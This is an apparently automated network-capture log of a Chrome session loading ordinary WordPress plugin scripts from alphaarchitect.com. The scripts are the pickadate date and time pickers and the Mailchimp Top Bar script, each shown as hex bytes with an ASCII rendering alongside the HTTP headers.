                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 61 74 65 28 74 2e 67 65 74 44 61 74 65 28 29 2b 61 2e 72 65 6c 29 2c 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 74 2c 61 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 76 69 67 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 70 2e 69 73 41 72 72 61 79 28 74 29 2c 73 3d 70 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 74 29 2c 6c 3d 74 68 69 73 2e 69 74 65 6d 2e 76 69 65 77 3b 69 66 28 6f 7c 7c 73 29 7b 66 6f 72 28 72 3d 73 3f 28 6e 3d 74 2e 79 65 61 72 2c 69 3d 74 2e 6d 6f 6e 74 68 2c 74 2e 64 61 74 65 29 3a 28 6e 3d 2b 74 5b 30 5d 2c 69 3d 2b 74 5b 31 5d 2c 2b 74 5b 32 5d 29 2c 61 26 26 61 2e 6e 61 76 26 26 6c 26 26 6c 2e 6d 6f 6e 74 68 21 3d 3d 69 26 26 28 6e 3d 6c 2e 79 65 61 72 2c 69 3d 6c 2e 6d 6f
                                                                                                                                                                                                                                                                        Data Ascii: ate(t.getDate()+a.rel),this.normalize(t,a)},a.prototype.navigate=function(e,t,a){var n,i,r,o=p.isArray(t),s=p.isPlainObject(t),l=this.item.view;if(o||s){for(r=s?(n=t.year,i=t.month,t.date):(n=+t[0],i=+t[1],+t[2]),a&&a.nav&&l&&l.month!==i&&(n=l.year,i=l.mo
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 3b 29 61 3d 73 2e 63 72 65 61 74 65 28 5b 61 2e 79 65 61 72 2c 61 2e 6d 6f 6e 74 68 2c 61 2e 64 61 74 65 2b 63 5d 29 3b 72 65 74 75 72 6e 20 61 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 61 62 6c 65 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 65 3d 28 65 3d 61 2e 69 74 65 6d 2e 64 69 73 61 62 6c 65 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 79 2e 69 73 49 6e 74 65 67 65 72 28 65 29 3f 74 2e 64 61 79 3d 3d 3d 28 61 2e 73 65 74 74 69 6e 67 73 2e 66 69 72 73 74 44 61 79 3f 65 3a 65 2d 31 29 25 37 3a 70 2e 69 73 41 72 72 61 79 28 65 29 7c 7c 79 2e 69 73 44 61 74 65 28 65 29 3f 74 2e 70 69 63 6b 3d 3d 3d 61 2e 63 72 65 61 74 65 28 65 29 2e 70 69 63 6b 3a 70 2e 69 73 50 6c 61 69 6e 4f
                                                                                                                                                                                                                                                                        Data Ascii: ;)a=s.create([a.year,a.month,a.date+c]);return a},a.prototype.disabled=function(t){var a=this,e=(e=a.item.disable.filter(function(e){return y.isInteger(e)?t.day===(a.settings.firstDay?e:e-1)%7:p.isArray(e)||y.isDate(e)?t.pick===a.create(e).pick:p.isPlainO
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3f 34 3a 74 2e 79 65 61 72 7d 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 70 6c 69 74 28 2f 28 64 7b 31 2c 34 7d 7c 6d 7b 31 2c 34 7d 7c 79 7b 34 7d 7c 79 79 7c 21 2e 29 2f 67 29 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 61 2e 66 6f 72 6d 61 74 73 2e 74 6f 41 72 72 61 79 28 65 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 79 2e 74 72 69 67 67 65 72 28 61 2e 66 6f 72 6d 61 74 73 5b 65 5d 2c 61 2c 5b 30 2c 74 5d 29 7c 7c 65 2e 72 65 70 6c 61 63 65 28 2f 5e 21 2f 2c 22 22 29 7d 29 2e 6a 6f 69 6e 28 22 22 29 7d 7d 2c 61 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                        Data Ascii: tion(e,t){return e?4:t.year},toArray:function(e){return e.split(/(d{1,4}|m{1,4}|y{4}|yy|!.)/g)},toString:function(e,t){var a=this;return a.formats.toArray(e).map(function(e){return y.trigger(a.formats[e],a,[0,t])||e.replace(/^!/,"")}).join("")}},a.prototy
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 73 61 62 6c 65 2c 73 3d 6f 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 22 66 6c 69 70 22 3d 3d 74 3f 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 29 3a 21 30 3d 3d 3d 74 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 31 29 2c 6f 3d 5b 5d 29 3a 21 31 3d 3d 3d 74 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 2d 31 29 2c 6f 3d 5b 5d 29 3a 74 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 61 2c 6e 2c 69 3d 30 3b 69 3c 73 3b 69 2b 3d 31 29 7b 69 66 28 61 3d 6f 5b 69 5d 2c 72 2e 69 73 44 61 74 65 45 78 61 63 74 28 61 2c 65 29 29 7b 6e 3d 21 28 74 3d 6f 5b 69 5d 3d 6e 75 6c 6c 29 3b 62 72 65 61 6b 7d 69 66 28 72 2e 69 73 44 61 74 65 4f 76 65 72 6c 61 70 28 61 2c 65 29 29 7b 70 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 3f 28 65 2e
                                                                                                                                                                                                                                                                        Data Ascii: sable,s=o.length;return"flip"==t?r.flipEnable():!0===t?(r.flipEnable(1),o=[]):!1===t?(r.flipEnable(-1),o=[]):t.map(function(e){for(var t,a,n,i=0;i<s;i+=1){if(a=o[i],r.isDateExact(a,e)){n=!(t=o[i]=null);break}if(r.isDateOverlap(a,e)){p.isPlainObject(e)?(e.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 63 74 69 6f 6e 20 61 28 29 7b 76 61 72 20 65 2c 74 2c 61 2c 6e 2c 69 3d 68 2e 79 65 61 72 2c 72 3d 21 30 3d 3d 3d 6c 2e 73 65 6c 65 63 74 59 65 61 72 73 3f 35 3a 7e 7e 28 6c 2e 73 65 6c 65 63 74 59 65 61 72 73 2f 32 29 3b 72 65 74 75 72 6e 20 72 3f 28 61 3d 70 2e 79 65 61 72 2c 65 3d 66 2e 79 65 61 72 2c 74 3d 69 2b 72 2c 28 72 3d 69 2d 72 29 3c 61 26 26 28 74 2b 3d 61 2d 72 2c 72 3d 61 29 2c 65 3c 74 26 26 28 72 2d 3d 28 6e 3d 74 2d 65 29 3c 28 61 3d 72 2d 61 29 3f 6e 3a 61 2c 74 3d 65 29 2c 79 2e 6e 6f 64 65 28 22 73 65 6c 65 63 74 22 2c 79 2e 67 72 6f 75 70 28 7b 6d 69 6e 3a 72 2c 6d 61 78 3a 74 2c 69 3a 31 2c 6e 6f 64 65 3a 22 6f 70 74 69 6f 6e 22 2c 69 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2c 30 2c 22 76 61 6c 75 65
                                                                                                                                                                                                                                                                        Data Ascii: ction a(){var e,t,a,n,i=h.year,r=!0===l.selectYears?5:~~(l.selectYears/2);return r?(a=p.year,e=f.year,t=i+r,(r=i-r)<a&&(t+=a-r,r=a),e<t&&(r-=(n=t-e)<(a=r-a)?n:a,t=e),y.node("select",y.group({min:r,max:t,i:1,node:"option",item:function(e){return[e,0,"value
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 28 28 74 3d 5b 6c 2e 6b 6c 61 73 73 2e 64 61 79 5d 29 2e 70 75 73 68 28 68 2e 6d 6f 6e 74 68 3d 3d 65 2e 6d 6f 6e 74 68 3f 6c 2e 6b 6c 61 73 73 2e 69 6e 66 6f 63 75 73 3a 6c 2e 6b 6c 61 73 73 2e 6f 75 74 66 6f 63 75 73 29 2c 63 2e 70 69 63 6b 3d 3d 65 2e 70 69 63 6b 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 6e 6f 77 29 2c 61 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 73 65 6c 65 63 74 65 64 29 2c 6e 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 68 69 67 68 6c 69 67 68 74 65 64 29 2c 69 26 26 74 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 64 69 73 61 62 6c 65 64 29 2c 74 2e 6a 6f 69 6e 28 22 20 22 29 29 2c 22 64 61 74 61 2d 70 69 63 6b 3d 22 2b 65 2e 70 69 63 6b 2b 22 20 22 2b 79 2e 61 72 69 61 41 74 74 72 28 7b 72 6f 6c 65 3a 22 67 72
                                                                                                                                                                                                                                                                        Data Ascii: ((t=[l.klass.day]).push(h.month==e.month?l.klass.infocus:l.klass.outfocus),c.pick==e.pick&&t.push(l.klass.now),a&&t.push(l.klass.selected),n&&t.push(l.klass.highlighted),i&&t.push(l.klass.disabled),t.join(" ")),"data-pick="+e.pick+" "+y.ariaAttr({role:"gr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC757INData Raw: 75 72 73 64 61 79 22 2c 22 46 72 69 64 61 79 22 2c 22 53 61 74 75 72 64 61 79 22 5d 2c 77 65 65 6b 64 61 79 73 53 68 6f 72 74 3a 5b 22 53 75 6e 22 2c 22 4d 6f 6e 22 2c 22 54 75 65 22 2c 22 57 65 64 22 2c 22 54 68 75 22 2c 22 46 72 69 22 2c 22 53 61 74 22 5d 2c 74 6f 64 61 79 3a 22 54 6f 64 61 79 22 2c 63 6c 65 61 72 3a 22 43 6c 65 61 72 22 2c 63 6c 6f 73 65 3a 22 43 6c 6f 73 65 22 2c 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 3a 21 30 2c 63 6c 6f 73 65 4f 6e 43 6c 65 61 72 3a 21 30 2c 75 70 64 61 74 65 49 6e 70 75 74 3a 21 30 2c 66 6f 72 6d 61 74 3a 22 64 20 6d 6d 6d 6d 2c 20 79 79 79 79 22 2c 6b 6c 61 73 73 3a 7b 74 61 62 6c 65 3a 28 74 3d 65 2e 6b 6c 61 73 73 65 73 28 29 2e 70 69 63 6b 65 72 2b 22 5f 5f 22 29 2b 22 74 61 62 6c 65 22 2c 68 65 61 64 65 72 3a
                                                                                                                                                                                                                                                                        Data Ascii: ursday","Friday","Saturday"],weekdaysShort:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],today:"Today",clear:"Clear",close:"Close",closeOnSelect:!0,closeOnClear:!0,updateInput:!0,format:"d mmmm, yyyy",klass:{table:(t=e.klasses().picker+"__")+"table",header:


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        53192.168.2.449809141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC600OUTGET /wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/script.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1343"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147808
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e87c2b4399-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC877INData Raw: 31 33 34 33 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 6e 29 7b 76 61 72 20 69 3d 6e 3f 22 3b 6d 61 78 2d 61 67 65 3d 22 2b 32 34 2a 6e 2a 36 30 2a 36 30 3a 22 22 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 2b 69 2b 22 3b 70 61 74 68 3d 2f 3b 53 61 6d 65 53 69 74 65 3d 6c 61 78 22 7d 63 6f 6e 73 74 20 65 3d 7b 65 78 69 73 74 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 67 45 78 70 28 74 2b 22 3d 22 29 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 7d 2c 63 72 65 61 74 65 3a 74 2c 65 72 61 73
                                                                                                                                                                                                                                                                        Data Ascii: 1343(()=>{"use strict";function t(t,e,n){var i=n?";max-age="+24*n*60*60:"";document.cookie=encodeURIComponent(t)+"="+encodeURIComponent(e)+i+";path=/;SameSite=lax"}const e={exists:function(t){return new RegExp(t+"=").test(document.cookie)},create:t,eras
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 74 69 63 6b 2e 62 69 6e 64 28 74 68 69 73 29 2c 35 30 30 29 7d 65 6c 73 65 20 74 68 69 73 2e 66 6f 72 6d 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 74 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 28 74 68 69 73 2e 62 75 74 74 6f 6e 29 2c 65 3d 74 68 69 73 2e 63 68 61 72 3b 69 28 74 68 69 73 2e 62 75 74 74 6f 6e 2c 74 2e 6c 65 6e 67 74 68 3e 3d 35 3f 65 3a 74 2b 22 20 22 2b 65 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 62 75 74 74 6f 6e 29 7b 74 68 69 73 2e 62 75 74 74 6f 6e 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                                        Data Ascii: =window.setInterval(this.tick.bind(this),500)}else this.form.style.opacity="0.5"},o.prototype.tick=function(){var t=n(this.button),e=this.char;i(this.button,t.length>=5?e:t+" "+e)},o.prototype.stop=function(){if(this.button){this.button.style.width=this.o
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 74 79 6c 65 2e 6c 69 6e 65 48 65 69 67 68 74 3d 63 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2b 22 70 78 22 29 2c 63 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 22 2c 63 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 3f 74 3a 30 2c 63 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 54 6f 70 3d 6d 3f 6e 3a 30 2c 63 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 3d 6d 3f 6e 3a 30 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 74 2e 74 61 72 67 65 74 2e 73 74 79 6c 65 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 22 22 2c 74 2e 74 61 72 67 65 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 76 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 74 2c 65 29 7b 74 2e 73 74 79 6c 65 2e 74 72 61 6e 73 69 74
                                                                                                                                                                                                                                                                        Data Ascii: tyle.lineHeight=c.clientHeight+"px"),c.style.visibility="",c.style.height=m?t:0,c.style.paddingTop=m?n:0,c.style.paddingBottom=m?n:0}function v(t){t.target.style.transition="",t.target.removeEventListener("transitionend",v)}function T(t,e){t.style.transit
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1324INData Raw: 73 6f 6c 65 2e 6c 6f 67 28 27 4d 61 69 6c 43 68 69 6d 70 20 54 6f 70 20 42 61 72 3a 20 66 61 69 6c 65 64 20 74 6f 20 70 61 72 73 65 20 41 4a 41 58 20 72 65 73 70 6f 6e 73 65 2e 5c 6e 5c 6e 45 72 72 6f 72 3a 20 22 27 2b 74 2b 27 22 27 29 7d 69 66 28 62 2e 73 75 63 63 65 73 73 3d 21 21 74 2e 73 75 63 63 65 73 73 2c 62 2e 73 75 62 6d 69 74 74 65 64 3d 21 30 2c 74 2e 73 75 63 63 65 73 73 26 26 74 2e 72 65 64 69 72 65 63 74 5f 75 72 6c 29 72 65 74 75 72 6e 20 76 6f 69 64 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 2e 72 65 64 69 72 65 63 74 5f 75 72 6c 29 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 68 26 26 68 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 68 29 2c 28 68 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61
                                                                                                                                                                                                                                                                        Data Ascii: sole.log('MailChimp Top Bar: failed to parse AJAX response.\n\nError: "'+t+'"')}if(b.success=!!t.success,b.submitted=!0,t.success&&t.redirect_url)return void(window.location.href=t.redirect_url);!function(t){h&&h.parentNode.removeChild(h),(h=document.crea
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        54192.168.2.449810141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC808OUTGET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.js?ver=3.6.2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-22bf"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147808
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e88928efa3-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC877INData Raw: 32 32 62 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 2e 2f 70 69 63 6b 65 72 22 2c 22 6a 71 75 65 72 79 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 2e 2f 70 69 63 6b 65 72 2e 6a 73 22 29 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 74 28 50 69 63 6b 65 72 2c 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6c 29 7b 76 61 72 20 65 2c 6d 3d 36 30 2c 6e 3d 31 34 34 30 2c 68 3d 74 2e 5f 3b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 61 29 7b 76 61 72 20 74 2c 65 3d 74 68
                                                                                                                                                                                                                                                                        Data Ascii: 22bf!function(t){"function"==typeof define&&define.amd?define(["./picker","jquery"],t):"object"==typeof exports?module.exports=t(require("./picker.js"),require("jquery")):t(Picker,jQuery)}(function(t,l){var e,m=60,n=1440,h=t._;function i(n,a){var t,e=th
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 3a 2d 31 2c 33 39 3a 31 2c 33 37 3a 2d 31 2c 67 6f 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 65 2e 69 74 65 6d 2e 68 69 67 68 6c 69 67 68 74 2e 70 69 63 6b 2b 74 2a 65 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 2c 7b 69 6e 74 65 72 76 61 6c 3a 74 2a 65 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 7d 29 2c 74 68 69 73 2e 72 65 6e 64 65 72 28 29 7d 7d 2c 6e 2e 6f 6e 28 22 72 65 6e 64 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 69 29 7b 72 28 22 74 72 61 6e 73 66 6f 72 6d 22 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 63 73 73 28 74 2c 69 29 7d 29 2c 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 63 73
                                                                                                                                                                                                                                                                        Data Ascii: :-1,39:1,37:-1,go:function(t){e.set("highlight",e.item.highlight.pick+t*e.item.interval,{interval:t*e.item.interval}),this.render()}},n.on("render",function(){function t(e,i){r("transform").map(function(t){e.css(t,i)}),r("transition").map(function(t){e.cs
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 69 73 49 6e 74 65 67 65 72 28 65 2e 70 69 63 6b 29 3f 65 3d 65 2e 70 69 63 6b 3a 6c 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3d 2b 65 5b 30 5d 2a 6d 2b 20 2b 65 5b 31 5d 3a 68 2e 69 73 49 6e 74 65 67 65 72 28 65 29 7c 7c 28 65 3d 72 2e 6e 6f 77 28 74 2c 65 2c 69 29 29 2c 22 6d 61 78 22 3d 3d 74 26 26 65 3c 72 2e 69 74 65 6d 2e 6d 69 6e 2e 70 69 63 6b 26 26 28 65 2b 3d 6e 29 2c 22 6d 69 6e 22 21 3d 74 26 26 22 6d 61 78 22 21 3d 74 26 26 28 65 2d 72 2e 69 74 65 6d 2e 6d 69 6e 2e 70 69 63 6b 29 25 72 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 21 3d 30 26 26 28 65 2b 3d 72 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 29 2c 7b 68 6f 75 72 3a 7e 7e 28 32 34 2b 28 65 3d 72 2e 6e 6f 72 6d 61 6c 69 7a 65 28 74 2c 65 2c 69 29 29 2f 6d 29 25 32 34 2c 6d 69 6e 73 3a 28 6d
                                                                                                                                                                                                                                                                        Data Ascii: isInteger(e.pick)?e=e.pick:l.isArray(e)?e=+e[0]*m+ +e[1]:h.isInteger(e)||(e=r.now(t,e,i)),"max"==t&&e<r.item.min.pick&&(e+=n),"min"!=t&&"max"!=t&&(e-r.item.min.pick)%r.item.interval!=0&&(e+=r.item.interval),{hour:~~(24+(e=r.normalize(t,e,i))/m)%24,mins:(m
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 3a 5b 32 33 2c 35 39 5d 29 29 3f 65 3d 74 68 69 73 2e 70 61 72 73 65 28 74 2c 65 29 3a 21 30 3d 3d 3d 65 7c 7c 68 2e 69 73 49 6e 74 65 67 65 72 28 65 29 3f 65 3d 74 68 69 73 2e 6e 6f 77 28 74 2c 65 2c 69 29 3a 6c 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 26 26 68 2e 69 73 49 6e 74 65 67 65 72 28 65 2e 70 69 63 6b 29 26 26 28 65 3d 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 74 2c 65 2e 70 69 63 6b 2c 69 29 29 2c 65 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 69 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 69 3d 28 69 26 26 69 2e 69 6e 74 65 72 76 61 6c 3f 69 3a 72 2e 69 74 65 6d 29 2e 69 6e 74 65 72 76 61 6c 3b 72 65 74 75 72 6e 20 72 2e 64 69 73 61 62 6c 65 64 28 65 29 26 26 28 65 3d 72
